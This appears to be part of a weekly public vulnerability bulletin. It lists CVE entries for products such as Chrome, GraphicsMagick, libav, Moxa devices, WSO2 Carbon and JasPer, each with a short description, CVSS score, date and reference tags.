google — chrome Heap buffer overflow during image processing in Skia in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5014
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled Unicode glyphs, which allowed a remote attacker to perform domain spoofing via IDN homographs in a crafted domain name. 2017-02-17 4.3 CVE-2017-5015
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to prevent certain UI elements from being displayed by non-visible pages, which allowed a remote attacker to show certain UI elements on a page they don’t control via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5016
BID
CONFIRM
CONFIRM
google — chrome A use after free in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5019
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to require a user gesture for powerful download operations, which allowed a remote attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5020
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to properly enforce unsafe-inline content security policy, which allowed a remote attacker to bypass content security policy via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5022
BID
CONFIRM
CONFIRM
google — chrome Type confusion in Histogram in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to potentially exploit a near null dereference via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5023
BID
CONFIRM
CONFIRM
google — chrome FFmpeg in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, failed to perform proper bounds checking, which allowed a remote attacker to potentially exploit heap corruption via a crafted video file. 2017-02-17 4.3 CVE-2017-5025
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, failed to prevent alerts from being displayed by swapped out frames, which allowed a remote attacker to show alerts on a page they don’t control via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5026
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to properly enforce unsafe-inline content security policy, which allowed a remote attacker to bypass content security policy via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5027
CONFIRM
CONFIRM
gosa_project — gosa_plugin Cross-site scripting (XSS) vulnerability in the displayLogin function in html/index.php in GOsa allows remote attackers to inject arbitrary web script or HTML via the username. 2017-02-13 4.3 CVE-2014-9760
MLIST
CONFIRM
graphicsmagick — graphicsmagick The ReadSCTImage function in coders/sct.c in GraphicsMagick 1.3.25 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted SCT header. 2017-02-15 5.0 CVE-2016-8682
CONFIRM
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
graphicsmagick — graphicsmagick The ReadPCXImage function in coders/pcx.c in GraphicsMagick 1.3.25 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure and a "file truncation error for corrupt file." 2017-02-15 6.8 CVE-2016-8683
CONFIRM
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
graphicsmagick — graphicsmagick The MagickMalloc function in magick/memory.c in GraphicsMagick 1.3.25 allows remote attackers to have unspecified impact via a crafted image, which triggers a memory allocation failure and a "file truncation error for corrupt file." 2017-02-15 6.8 CVE-2016-8684
CONFIRM
SUSE
DEBIAN
MLIST
BID
MISC
CONFIRM
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. Any user can obtain a password by accessing a specific URL, because the password is stored in plaintext. 2017-02-13 5.0 CVE-2017-5139
BID
MISC
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. Password is stored in clear text. 2017-02-13 5.0 CVE-2017-5140
BID
MISC
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. An attacker can establish a new user session, without invalidating any existing session identifier, which gives the opportunity to steal authenticated sessions (SESSION FIXATION). 2017-02-13 6.5 CVE-2017-5141
BID
MISC
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. A user with low privileges is able to open and change the parameters by accessing a specific URL because of Improper Privilege Management. 2017-02-13 6.5 CVE-2017-5142
BID
MISC
ibm — aix IBM AIX 7.1 and 7.2 allows a local user to open a file with a specially crafted argument that would crash the system. IBM APARs: IV91488, IV91487, IV91456, IV90234. 2017-02-15 4.9 CVE-2016-8944
CONFIRM
BID
ibm — cognos_disclosure_management IBM Cognos Disclosure Management 10.2 could allow an attacker to execute commands with the privileges of a lower-privileged user who opens a malicious document. IBM Reference #: 1991584. 2017-02-15 6.8 CVE-2016-6077
CONFIRM
BID
ibm — integration_bus IBM WebSphere Message Broker 9.0 and 10.0 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim’s click actions and possibly launch further attacks against the victim. IBM Reference #: 1997906. 2017-02-15 4.3 CVE-2016-9010
CONFIRM
ibm — rational_requirements_composer An undisclosed vulnerability in IBM Rational DOORS Next Generation 4.0, 5.0, and 6.0 could allow a JazzGuest user to see project names. IBM Reference #: 1995547. 2017-02-15 4.0 CVE-2016-6060
CONFIRM
kabona_ab — webdatorcentral An issue was discovered in Kabona AB WebDatorCentral (WDC) application prior to Version 3.4.0. The web server URL inputs are not sanitized correctly, which may allow cross-site scripting vulnerabilities. 2017-02-13 4.3 CVE-2016-8356
BID
MISC
kabona_ab — webdatorcentral An issue was discovered in Kabona AB WebDatorCentral (WDC) application prior to Version 3.4.0. This non-validated redirect/non-validated forward (OPEN REDIRECT) allows chaining with authenticated vulnerabilities. 2017-02-13 5.8 CVE-2016-8376
BID
MISC
libav — libav Heap-based buffer overflow in the ff_audio_resample function in resample.c in libav before 11.4 allows remote attackers to cause a denial of service (crash) via vectors related to buffer resizing. 2017-02-15 4.3 CVE-2016-6832
MLIST
MLIST
MISC
CONFIRM
CONFIRM
libav — libav Stack-based buffer overflow in the aac_sync function in aac_parser.c in Libav before 11.5 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted file. 2017-02-15 4.3 CVE-2016-7393
MLIST
BID
MISC
CONFIRM
libav — libav The ff_put_pixels8_xy2_mmx function in rnd_template.c in Libav 11.7 allows remote attackers to cause a denial of service (invalid memory access and crash) via a crafted mp3 file. NOTE: this issue was originally reported as involving a NULL pointer dereference. 2017-02-15 4.3 CVE-2016-7477
MLIST
BID
MISC
libav — libav The sbr_make_f_master function in aacsbr.c in Libav 11.7 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted mp3 file. 2017-02-15 4.3 CVE-2016-7499
MLIST
BID
MISC
CONFIRM
libav — libav The get_vlc2 function in get_bits.h in Libav before 11.9 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a crafted mp3 file, possibly related to startcode sequences during m4v detection. 2017-02-15 4.3 CVE-2016-8675
MLIST
BID
MISC
CONFIRM
libav — libav The get_vlc2 function in get_bits.h in Libav 11.9 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a crafted mp3 file. NOTE: this issue exists due to an incomplete fix for CVE-2016-8675. 2017-02-15 4.3 CVE-2016-8676
MLIST
MLIST
BID
MISC
MISC
libdwarf_project — libdwarf libdwarf 20151114 and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a debug_abbrev section marked NOBITS in an ELF file. 2017-02-13 4.3 CVE-2015-8750
MLIST
CONFIRM
CONFIRM
libming — libming The _iprintf function in outputtxt.c in the listswf tool in libming 0.4.7 allows remote attackers to cause a denial of service (buffer over-read) via a crafted SWF file. 2017-02-16 4.3 CVE-2016-9827
MLIST
MLIST
BID
MISC
libming — libming The dumpBuffer function in read.c in the listswf tool in libming 0.4.7 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted SWF file. 2017-02-16 4.3 CVE-2016-9828
MLIST
MLIST
BID
MISC
libming — libming Heap-based buffer overflow in the parseSWF_DEFINEFONT function in parser.c in the listswf tool in libming 0.4.7 allows remote attackers to have unspecified impact via a crafted SWF file. 2017-02-16 6.8 CVE-2016-9829
MLIST
MLIST
BID
MISC
libming — libming Heap-based buffer overflow in the parseSWF_RGBA function in parser.c in the listswf tool in libming 0.4.7 allows remote attackers to have unspecified impact via a crafted SWF file. 2017-02-16 6.8 CVE-2016-9831
MLIST
MLIST
BID
MISC
linux — linux_kernel The ipv4_pktinfo_prepare function in net/ipv4/ip_sockglue.c in the Linux kernel through 4.9.9 allows attackers to cause a denial of service (system crash) via (1) an application that makes crafted system calls or possibly (2) IPv4 traffic with invalid IP options. 2017-02-14 5.0 CVE-2017-5970
CONFIRM
MLIST
CONFIRM
CONFIRM
CONFIRM
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. A user with read-only access can send commands to the software and the application will accept those commands. This would allow an attacker with read-only access to make changes within the application. 2017-02-13 5.5 CVE-2016-8357
BID
MISC
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application does not sufficiently verify if a request was intentionally provided by the user who submitted the request (CROSS-SITE REQUEST FORGERY). 2017-02-13 6.8 CVE-2016-8369
BID
MISC
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application’s database lacks sufficient safeguards for protecting credentials. 2017-02-13 5.0 CVE-2016-8378
BID
MISC
mariadb — mariadb Crash in libmysqlclient.so in Oracle MySQL before 5.6.21 and 5.7.x before 5.7.5 and MariaDB through 5.5.54, 10.0.x through 10.0.29, 10.1.x through 10.1.21, and 10.2.x through 10.2.3. 2017-02-11 5.0 CVE-2017-3302
MISC
moxa — dacenter An issue was discovered in Moxa DACenter Versions 1.4 and older. The application may suffer from an unquoted search path issue. 2017-02-13 4.6 CVE-2016-9356
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Requests are not verified to be intentionally submitted by the proper user (CROSS-SITE REQUEST FORGERY). 2017-02-13 6.8 CVE-2016-9365
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. An attacker can freely use brute force to determine parameters needed to bypass authentication. 2017-02-13 5.0 CVE-2016-9366
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. User-controlled input is not neutralized before being output to web page (CROSS-SITE SCRIPTING). 2017-02-13 4.3 CVE-2016-9371
BID
MISC
moxa — softcms An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. A specially crafted URL request sent to the SoftCMS ASP Webserver can cause a double free condition on the server allowing an attacker to modify memory locations and possibly cause a denial of service or the execution of arbitrary code. 2017-02-13 6.8 CVE-2016-8360
BID
MISC
moxa — softcms An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. The SoftCMS Application does not properly sanitize input that may allow a remote attacker access to SoftCMS with administrator’s privilege through specially crafted input (SQL INJECTION). 2017-02-13 6.5 CVE-2016-9333
BID
MISC
nitro_software — nitro_pro A remote out of bound write / memory corruption vulnerability exists in the PDF parsing functionality of Nitro Pro 10. A specially crafted PDF file can cause a vulnerability resulting in potential memory corruption. An attacker can send the victim a specific PDF file to trigger this vulnerability. 2017-02-10 6.8 CVE-2016-8709
MISC
nitro_software — nitro_pro A potential remote code execution vulnerability exists in the PDF parsing functionality of Nitro Pro 10. A specially crafted PDF file can cause a vulnerability resulting in potential code execution. An attacker can send the victim a specific PDF file to trigger this vulnerability. 2017-02-10 6.8 CVE-2016-8711
MISC
omnimetrix — omniview An issue was discovered in OmniMetrix OmniView, Version 1.2. The OmniView web application transmits credentials with the HTTP protocol, which could be sniffed by an attacker that may result in the compromise of account credentials. 2017-02-13 5.0 CVE-2016-5786
BID
MISC
omnimetrix — omniview An issue was discovered in OmniMetrix OmniView, Version 1.2. Insufficient password requirements for the OmniView web application may allow an attacker to gain access by brute forcing account passwords. 2017-02-13 5.0 CVE-2016-5801
BID
MISC
opensuse_project — leap Stack-based buffer overflow in the safe_fprintf function in tar/util.c in libarchive 3.2.1 allows remote attackers to cause a denial of service via a crafted non-printable multibyte character in a filename. 2017-02-15 5.0 CVE-2016-8687
SUSE
MLIST
BID
MISC
CONFIRM
MISC
GENTOO
opensuse_project — leap The mtree bidder in libarchive 3.2.1 does not keep track of line sizes when extending the read-ahead, which allows remote attackers to cause a denial of service (crash) via a crafted file, which triggers an invalid read in the (1) detect_form or (2) bid_entry function in libarchive/archive_read_support_format_mtree.c. 2017-02-15 4.3 CVE-2016-8688
SUSE
MLIST
BID
MISC
MISC
MISC
MISC
MISC
CONFIRM
CONFIRM
GENTOO
opensuse_project — leap The read_Header function in archive_read_support_format_7zip.c in libarchive 3.2.1 allows remote attackers to cause a denial of service (out-of-bounds read) via multiple EmptyStream attributes in a header in a 7zip archive. 2017-02-15 5.0 CVE-2016-8689
SUSE
MLIST
BID
MISC
CONFIRM
CONFIRM
GENTOO
otrs — otrs Cross-site scripting (XSS) vulnerability in Open Ticket Request System (OTRS) 3.3.x before 3.3.16, 4.0.x before 4.0.19, and 5.0.x before 5.0.14 allows remote attackers to inject arbitrary web script or HTML via a crafted attachment. 2017-02-16 4.3 CVE-2016-9139
BID
CONFIRM
python — openpyxl Openpyxl 2.4.1 resolves external entities by default, which allows remote attackers to conduct XXE attacks via a crafted .xlsx document. 2017-02-15 5.8 CVE-2017-5992
CONFIRM
CONFIRM
CONFIRM
CONFIRM
samsung — samsung_mobile Samsung devices with Android KK(4.4), L(5.0/5.1), or M(6.0) allow attackers to cause a denial of service (system crash) via a crafted system call to TvoutService_C. 2017-02-13 5.0 CVE-2016-4547
CONFIRM
MLIST
schneider_electric — homelynk_controller_lss100100_firmware An issue was discovered in Schneider Electric homeLYnk Controller, LSS100100, all versions prior to V1.5.0. The homeLYnk controller is susceptible to a cross-site scripting attack. User inputs can be manipulated to cause execution of JavaScript code. 2017-02-13 4.3 CVE-2017-5157
BID
MISC
visonic — powerlink2_firmware An issue was discovered in Visonic PowerLink2, all versions prior to October 2016 firmware release. User controlled input is not neutralized prior to being placed in web page output (CROSS-SITE SCRIPTING). 2017-02-13 4.3 CVE-2016-5811
BID
MISC
wordpress — mail_plugin An issue was discovered in the WP Mail plugin before 1.2 for WordPress. The replyto parameter when composing a mail allows for a reflected XSS. This would allow you to execute JavaScript in the context of the user receiving the mail. 2017-02-10 4.3 CVE-2017-5942
MISC
wso2 — carbon Directory traversal vulnerability in the LogViewer Admin Service in WSO2 Carbon 4.4.5 allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the logFile parameter to downloadgz-ajaxprocessor.jsp. 2017-02-16 4.0 CVE-2016-4314
MISC
MISC
BUGTRAQ
BID
CONFIRM
EXPLOIT-DB
wso2 — carbon Multiple cross-site scripting (XSS) vulnerabilities in WSO2 Carbon 4.4.5 allow remote attackers to inject arbitrary web script or HTML via the (1) setName parameter to identity-mgt/challenges-mgt.jsp; the (2) webappType or (3) httpPort parameter to webapp-list/webapp_info.jsp; the (4) dsName or (5) description parameter to ndatasource/newdatasource.jsp; the (6) phase parameter to viewflows/handlers.jsp; or the (7) url parameter to ndatasource/validateconnection-ajaxprocessor.jsp. 2017-02-16 4.3 CVE-2016-4316
MISC
MISC
BUGTRAQ
BID
EXPLOIT-DB
wso2 — enablement_server_for_java Cross-site scripting (XSS) vulnerability in WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. 2017-02-16 4.3 CVE-2016-4327
MISC
BUGTRAQ
BID

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
bigtreecms — bigtree_cms An issue was discovered in BigTree CMS before 4.2.15. The vulnerability exists due to insufficient filtration of user-supplied data in the "id" HTTP GET parameter passed to the "core/admin/adjax/dashboard/check-module-integrity.php" URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. 2017-02-14 3.5 CVE-2016-10223
CONFIRM
CONFIRM
ibm — rational_collaborative_lifecycle_management IBM Jazz Foundation is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1998515. 2017-02-15 3.5 CVE-2016-8968
CONFIRM
ibm — websphere_application_server IBM WebSphere Application Server 7.0, 8.0, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM Reference #: 1997743. 2017-02-13 3.5 CVE-2017-1121
CONFIRM
linux — linux_kernel The time subsystem in the Linux kernel through 4.9.9, when CONFIG_TIMER_STATS is enabled, allows local users to discover real PID values (as distinguished from PID values inside a PID namespace) by reading the /proc/timer_list file, related to the print_timer function in kernel/time/timer_list.c and the __timer_stats_timer_set_start_info function in kernel/time/timer.c. 2017-02-14 2.1 CVE-2017-5967
CONFIRM
MISC
mcafee — epolicy_orchestrator Cross-site scripting (XSS) vulnerability in the Web user interface (UI) in Intel Security ePO 5.1.3, 5.1.2, 5.1.1, and 5.1.0 allows authenticated users to inject malicious Java scripts via bypassing input validation. 2017-02-13 3.5 CVE-2017-3902
CONFIRM
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. A configuration file contains parameters that represent passwords in plaintext. 2017-02-13 2.1 CVE-2016-9348
BID
MISC
samsung — samsung_mobile Samsung devices with Android KK(4.4) or L(5.0/5.1) allow local users to cause a denial of service (IAndroidShm service crash) via crafted data in a service call. 2017-02-13 2.1 CVE-2016-4546
CONFIRM
MLIST
wso2 — carbon Cross-site request forgery (CSRF) vulnerability in WSO2 Carbon 4.4.5 allows remote attackers to hijack the authentication of privileged users for requests that shutdown a server via a shutdown action to server-admin/proxy_ajaxprocessor.jsp. 2017-02-16 3.5 CVE-2016-4315
MISC
MISC
BUGTRAQ
BID
CONFIRM
EXPLOIT-DB

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apache_software_foundation — apache_tomcat It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop. The denial of service is easily achievable as a consequence of backporting a CVE-2016-6816 fix but not backporting the fix for Tomcat bug 57544. Distributions affected by this backporting issue include Debian (before 7.0.56-3+deb8u8 and 8.0.14-1+deb8u7 in jessie) and Ubuntu. 2017-02-17 not yet calculated CVE-2017-6056
CONFIRM
CONFIRM
CONFIRM
CONFIRM
artifex_software — mupdf An issue was discovered in Artifex Software, Inc. MuPDF before 1912de5f08e90af1d9d0a9791f58ba3afdb9d465. The pdf_run_xobject function in pdf-op-run.c encounters a NULL pointer dereference during a Fitz fz_paint_pixmap_with_mask painting operation. 2017-02-15 not yet calculated CVE-2017-5991
CONFIRM
CONFIRM
bd — alaris An issue was discovered in Becton, Dickinson and Company (BD) Alaris 8015 Point of Care (PC) unit, Version 9.5 and prior versions, and Version 9.7, and 8000 PC unit. An unauthorized user with physical access to an affected Alaris PC unit may be able to obtain unencrypted wireless network authentication credentials and other sensitive technical data by disassembling the PC unit and accessing the device’s flash memory. The Alaris 8015 PC unit, Version 9.7, and the 8000 PC unit store wireless network authentication credentials and other sensitive technical data on internal flash memory. Accessing the internal flash memory of the affected device would require special tools to extract data and carrying out this attack at a healthcare facility would increase the likelihood of detection. 2017-02-13 not yet calculated CVE-2016-8375
BID
MISC
MISC
bd — alaris An issue was discovered in Becton, Dickinson and Company (BD) Alaris 8015 Point of Care (PC) unit, Version 9.5 and prior versions, and Version 9.7. An unauthorized user with physical access to an Alaris 8015 PC unit may be able to obtain unencrypted wireless network authentication credentials and other sensitive technical data by disassembling an Alaris 8015 PC unit and accessing the device’s flash memory. Older software versions of the Alaris 8015 PC unit, Version 9.5 and prior versions, store wireless network authentication credentials and other sensitive technical data on the affected device’s removable flash memory. Being able to remove the flash memory from the affected device reduces the risk of detection, allowing an attacker to extract stored data at the attacker’s convenience. 2017-02-13 not yet calculated CVE-2016-9355
BID
MISC
ca_technologies — infrastructure_management An issue was discovered in CA Unified Infrastructure Management Version 8.47 and earlier. The Unified Infrastructure Management software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory. 2017-02-13 not yet calculated CVE-2016-5803
BID
MISC
carlo_gavazzi — vmu-c_em An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. The access control flaw allows access to most application functions without authentication. 2017-02-13 not yet calculated CVE-2017-5144
BID
MISC
carlo_gavazzi — vmu-c_em An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Sensitive information is stored in clear-text. 2017-02-13 not yet calculated CVE-2017-5146
BID
MISC
carlo_gavazzi — vmu-c_em An issue was discovered in Carlo Gavazzi VMU-C EM prior to firmware Version A11_U05, and VMU-C PV prior to firmware Version A17. Successful exploitation of this CROSS-SITE REQUEST FORGERY (CSRF) vulnerability can allow execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 2017-02-13 not yet calculated CVE-2017-5145
BID
MISC
cisco — cisco_ucs A vulnerability in the web-based GUI of Cisco UCS Director 6.0.0.0 and 6.0.0.1 could allow an authenticated, local attacker to execute arbitrary workflow items with just an end-user profile, a Privilege Escalation Vulnerability. The vulnerability is due to improper role-based access control (RBAC) after the Developer Menu is enabled in Cisco UCS Director. An attacker could exploit this vulnerability by enabling Developer Mode for his/her user profile with an end-user profile and then adding new catalogs with arbitrary workflow items to his/her profile. An exploit could allow an attacker to perform any actions defined by these workflow items, including actions affecting other tenants. Cisco Bug IDs: CSCvb64765. 2017-02-15 not yet calculated CVE-2017-3801
CONFIRM
cisco — jasper The jpc_dec_process_siz function in libjasper/jpc/jpc_dec.c in JasPer before 1.900.4 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted YRsiz value in a BMP image to the imginfo command. 2017-02-15 not yet calculated CVE-2016-8692
DEBIAN
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
cisco — jasper Stack-based buffer overflow in the jpc_tsfb_getbands2 function in jpc_tsfb.c in JasPer before 1.900.30 allows remote attackers to have unspecified impact via a crafted image. 2017-02-15 not yet calculated CVE-2016-9560
MLIST
MLIST
BID
MISC
CONFIRM
cisco — jasper Double free vulnerability in the mem_close function in jas_stream.c in JasPer before 1.900.10 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted BMP image to the imginfo command. 2017-02-15 not yet calculated CVE-2016-8693
SUSE
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
cisco — jasper The jpc_dec_process_siz function in libjasper/jpc/jpc_dec.c in JasPer before 1.900.4 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted XRsiz value in a BMP image to the imginfo command. 2017-02-15 not yet calculated CVE-2016-8691
DEBIAN
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
cisco — jasper The bmp_getdata function in libjasper/bmp/bmp_dec.c in JasPer before 1.900.5 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted BMP image in an imginfo command. 2017-02-15 not yet calculated CVE-2016-8690
MLIST
MLIST
BID
MISC
CONFIRM
CONFIRM
FEDORA
crypto++ — crypto++ The timing attack protection in Rijndael::Enc::ProcessAndXorBlock and Rijndael::Dec::ProcessAndXorBlock in Crypto++ (aka cryptopp) before 5.6.4 may be optimized out by the compiler, which allows attackers to conduct timing attacks. 2017-02-13 not yet calculated CVE-2016-3995
MLIST
BID
CONFIRM
delta_electronics — delta-electronics An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to 2.10.10. Multiple instances of out-of-bounds write conditions may allow malicious files to be read and executed by the affected software. 2017-02-13 not yet calculated CVE-2016-5802
BID
MISC
delta_electronics — delta-electronics An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to 2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. 2017-02-13 not yet calculated CVE-2016-5805
BID
MISC
dovecot — dovecot The auth component in Dovecot before 2.2.27, when auth-policy is configured, allows remote attackers to cause a denial of service (crash) by aborting authentication without setting a username. 2017-02-16 not yet calculated CVE-2016-8652
MLIST
MLIST
MLIST
BID
eaton — epdu An issue was discovered in certain legacy Eaton ePDUs — the affected products are past end-of-life (EoL) and no longer supported: EAMxxx prior to June 30, 2015, EMAxxx prior to January 31, 2014, EAMAxx prior to January 31, 2014, EMAAxx prior to January 31, 2014, and ESWAxx prior to January 31, 2014. An unauthenticated attacker may be able to access configuration files with a specially crafted URL (Path Traversal). 2017-02-13 not yet calculated CVE-2016-9357
BID
MISC
ecommerce_shopsoftware — ecommerce_shopsoftware Multiple SQL injection vulnerabilities in modified eCommerce Shopsoftware 2.0.0.0 revision 9678, when the easybill-module is not installed, allow remote attackers to execute arbitrary SQL commands via the (1) orders_status or (2) customers_status parameter to api/easybill/easybillcsv.php. 2017-02-15 not yet calculated CVE-2016-3694
MISC
EXPLOIT-DB
emerson — deltav An issue was discovered in Emerson DeltaV Easy Security Management DeltaV V12.3, DeltaV V12.3.1, and DeltaV V13.3. Critical vulnerabilities may allow a local attacker to elevate privileges within the DeltaV control system. 2017-02-13 not yet calculated CVE-2016-9345
BID
MISC
emerson — emerson An issue was discovered in Emerson SE4801T0X Redundant Wireless I/O Card V13.3, and SE4801T1X Simplex Wireless I/O Card V13.3. DeltaV Wireless I/O Cards (WIOC) running the firmware available in the DeltaV system, release v13.3, have the SSH (Secure Shell) functionality enabled unnecessarily. 2017-02-13 not yet calculated CVE-2016-9347
BID
MISC
emerson — liebert_sitescan An XML External Entity (XXE) issue was discovered in Emerson Liebert SiteScan Web Version 6.5, and prior. An attacker may enter malicious input to Liebert SiteScan through a weakly configured XML parser causing the application to execute arbitrary code or disclose file contents from a server or connected network. 2017-02-13 not yet calculated CVE-2016-8348
BID
MISC
eparaksts — eparaksts XML external entity (XXE) vulnerability in eParakstitajs 3 before 1.3.9 and eParaksts Java lib before 2.5.13 allows remote attackers to read arbitrary files or possibly have unspecified other impact via a crafted edoc file. 2017-02-17 not yet calculated CVE-2017-6055
MISC
MISC
facebook — hhvm Self recursion in compact in Facebook HHVM before 3.15.0 allows attackers to have unspecified impact via unknown vectors. 2017-02-17 not yet calculated CVE-2016-6873
MLIST
MLIST
CONFIRM
